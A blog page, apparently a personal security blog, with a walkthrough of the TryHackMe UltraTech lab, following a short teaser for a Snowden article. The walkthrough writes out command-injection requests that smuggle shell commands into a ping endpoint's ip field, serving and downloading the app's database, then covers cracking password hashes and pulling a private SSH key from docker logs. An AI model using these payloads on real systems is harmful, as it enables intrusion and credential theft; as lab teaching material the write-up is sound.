Skip to main content

Featured

Edward Snowden: A Journey from NSA Whistleblower to Global Icon

  Edward Snowden is one of the most significant figures in modern history, known for his courageous act of whistleblowing that exposed widespread government surveillance programs. His actions ignited global debates on privacy, security, and government transparency. This blog will walk through his journey—from his early career, his decision to leak classified information, the aftermath, and his ongoing impact on privacy and cybersecurity. Early Life and Career Edward Joseph Snowden was born on June 21, 1983, in Elizabeth City, North Carolina. His early life wasn't extraordinary, but he exhibited a strong interest in computers from a young age. Snowden dropped out of high school but later obtained a General Educational Development (GED) certificate. His passion for computers led him to study at a community college before moving into the technology field, where he worked for companies like Dell and Booz Allen Hamilton. His early career involved working as a systems engineer, but he so...
Post a Comment
Read more

Ultra Tech walkthrough on tryhackme

 The UltraTech room on TryHackMe is a cybersecurity training environment designed to teach and test various skills related to penetration testing, network exploitation, and vulnerability assessment. Here’s a breakdown of what you might encounter in the UltraTech room:



Overview

  • Objective: Gain unauthorized access to the UltraTech network, identify vulnerabilities, exploit them, and capture specific flags as proof of your achievements.
  • Difficulty Level: The difficulty can range from beginner to intermediate, depending on the specific tasks and challenges set within the room.

Key Concepts and Skills

  • Network Scanning: Use tools like Nmap to discover active devices, open ports, and running services within the UltraTech network.
  • Enumeration: Gather detailed information about the identified services and devices to find potential vulnerabilities.
  • Exploitation: Use known vulnerabilities or craft exploits to gain access to systems. This could involve web application attacks, password cracking, or exploiting network services.
  • Privilege Escalation: Once access is gained, escalate privileges to gain more control over the compromised system. This might include exploiting kernel vulnerabilities, misconfigurations, or weak file permissions.
  • Post-Exploitation: Conduct actions such as maintaining access, covering tracks, or extracting sensitive information once higher privileges are obtained.

Common Tools and Techniques

  • Reconnaissance: Nmap, Netcat, Nikto, Dirbuster.
  • Exploitation: Metasploit, manual exploitation scripts, SQL injection, Cross-Site Scripting (XSS).
  • Privilege Escalation: LinPEAS, WinPEAS, manual enumeration, exploiting SUID files, kernel exploits.
  • Post-Exploitation: Mimikatz, PowerShell scripts, data exfiltration tools.

Flags

  • User Flags: Indicate successful access to user-level accounts on the compromised machines.
  • Root/Admin Flags: Indicate successful privilege escalation to the highest level of access on the machine.

Learning Outcomes

  • Develop a comprehensive approach to penetration testing, including reconnaissance, exploitation, and post-exploitation.
  • Gain hands-on experience with popular tools and techniques used by penetration testers and ethical hackers.
  • Understand the importance of detailed enumeration and the common vulnerabilities found in real-world systems.
  • Learn strategies for escalating privileges and maintaining access in a compromised network.

The UltraTech room provides a realistic and challenging environment to practice and hone your cybersecurity skills, making it an excellent resource for both beginners and those looking to advance their knowledge in the field.

Lets start solving this room

1.) deploy the machine 


2.) Run the nmap scan

Command - nmap -sC -sV -T4 <IP>


Now you can solve this answers by looking on the nmap scan


The software using the port 8081 is a REST api, how many of its routes are used by the web application? - To answer this question we have to do gobuster scan on port 8081




Examine the website on port 31331



Check the robots.txt file, there you find the map of website /utech_sitemap.txt


Open this directory /utech_sitemap.txt

You found these directories 

/

/index.html

/what.html

/partners.html


3.) Open up burpsuite and then open /partners.html


click on the /ping?ip=10.10.191.119 and then send to repeater


Edit to the request 

GET /ping?ip=`id` HTTP/1.1

Host: 10.10.191.119:8081

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Origin: http://10.10.191.119:31331

Connection: close

Referer: http://10.10.191.119:31331/

If-None-Match: W/"10b-4dgJl7lwc/A/bgU7Q6fF0qNyH84"



edit again the request with python3 -m http.server 8090 then url decoding (by using ctrl+u)

GET /ping?ip=`python3+-m+http.server+8090` HTTP/1.1

Host: 10.10.191.119:8081

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Origin: http://10.10.191.119:31331

Connection: close

Referer: http://10.10.191.119:31331/

If-None-Match: W/"10b-4dgJl7lwc/A/bgU7Q6fF0qNyH84"




Open firefox then visit webserver <IP>:8090 and download utech.db.sqlite

Open up utech.db.sqlite


Copy the hash of admin and root

Visit https://crackstation.net/ to crack the hash


Now you can solve Task 3


Task 4

Connect to the ssh server


Enter this command docker logs unruffled_shockley and then copy paste first 0 character of private ssh key


THE END


Thank you for reading the walkthrough of ultratech room

HAPPY HACKING!

Comments

Post a Comment

Popular Posts